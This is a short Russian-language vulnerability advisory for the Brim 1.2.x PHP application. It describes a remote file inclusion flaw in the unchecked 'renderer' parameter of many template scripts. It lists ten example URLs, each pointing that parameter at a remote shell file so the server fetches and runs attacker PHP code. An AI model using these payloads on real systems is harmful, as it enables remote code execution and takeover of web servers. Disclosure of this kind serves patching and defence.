Программа: Brim 1.2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "renderer" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?



Оставить мнение